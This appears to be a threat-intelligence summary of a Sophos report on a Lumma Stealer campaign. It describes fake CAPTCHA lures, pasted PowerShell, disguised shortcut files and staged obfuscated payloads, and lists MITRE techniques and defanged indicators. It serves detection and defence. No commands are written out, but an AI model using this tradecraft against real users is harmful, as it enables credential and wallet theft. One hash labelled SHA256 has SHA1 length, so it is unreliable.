Threat Research

Lumma Stealer, coming and going

Sophos
Lumma Stealer, coming and going
EXTRACT IOC
In late 2024, Sophos uncovered a Lumma Stealer campaign abusing fake CAPTCHA sites to trick victims into running malicious PowerShell commands, delivering an info-stealing payload that siphons credentials and crypto wallets. The malware uses obfuscation and multi-stage downloads to evade detection. (Affected: Windows users, cybersecurity sector)

Keypoints :

  • Lumma Stealer is an info-stealer active since mid-2022, offered as Malware-as-a-Service via Telegram.
  • The stealer targets passwords, session tokens, crypto wallets, and personal data from compromised Windows devices.
  • Attackers use fake CAPTCHA websites to trick users into pasting malicious PowerShell commands into Windows Run dialog.
  • PowerShell scripts download and execute the Lumma Stealer payload from remote servers hosted on Cloud services.
  • Payload includes obfuscated AutoIt scripts that steal browser credentials and exfiltrate data via C2 servers.
  • Alternate delivery uses disguised shortcut (.lnk) files that launch obfuscated PowerShell commands via OpenSSH utilities.
  • Payload uses AES encryption and dynamic .NET assembly loading to evade detection and perform runtime downloads.
  • The malware downloads and executes multiple payload stages, ending with exfiltration of stolen credentials.
  • Detection queries leveraging endpoint telemetry can help identify suspicious files, processes, and network activity.
  • User education to distrust CAPTCHAs and use of robust endpoint detection can mitigate Lumma Stealer risks.

MITRE Techniques :

  • Spearphishing via Service (T1194) – Using fake CAPTCHA sites to lure victims to execute malicious commands.
  • User Execution (T1204) – Victims manually paste PowerShell commands and execute disguised shortcut files.
  • PowerShell (T1059.001) – Malicious PowerShell scripts are used extensively to download and execute payloads.
  • Obfuscated Files or Information (T1027) – Payload and scripts use obfuscation, base64 encoding, and AES encryption.
  • Deobfuscate/Decode Files or Information (T1140) – Script decoding to reveal embedded PE files and further payloads.
  • Command and Scripting Interpreter (T1059) – Leveraging Windows Command Line and PowerShell for execution.
  • File and Directory Discovery (T1083) – Scripts access user directories like %AppData% and %temp% to place malicious files.
  • Exfiltration Over Command and Control Channel (T1041) – Stolen browser cookies and credentials exfiltrated to C2 servers.
  • Masquerading (T1036) – The payload is named ‘ArtistSponsorship.exe’ and shortcut files masquerade as PDFs.
  • Process Injection (T1055) – Loading the malicious PE dynamically into memory via .NET Assembly ‘Load’ method.

Indicator of Compromise :

  • The article mentions multiple malicious domains used as command-and-control servers such as snail-r1ced[.]cyou and fixedzip[.]oss-ap-southeast-5[.]aliyuncs[.]com.
  • There are SHA256 hashes of payload files including ArtistSponsorship.exe (sha256:e298cd6c5fe7b9b05a28480fd215ddcbd7aaa48a) and an obfuscated AutoIt script (sha256:05d8cf394190f3a707abfb25fb44d7da9d5f533d7d2063b23c00cc11253c8be7).
  • Indicators also include IP addresses like 104.21.84[.]251 associated with C2 infrastructure.
  • File paths such as %AppData%, %temp%, and specific filenames like ‘i1040gi.pdf’ and ‘ArtistSponsorship.exe’ are noted as infection artifacts.
  • Script behaviors including PowerShell command lines downloading scripts from URLs and suspicious execution of mshta.exe and sftp.exe proxies are observable IOCs.

Read more: https://news.sophos.com/en-us/2025/05/09/lumma-stealer-coming-and-going/

Views: 23

Tags: BROWSER, WINDOWS, MDR, SOCIAL ENGINEERING, PAYLOAD, EXFILTRATION, DISCOVERY, HUNT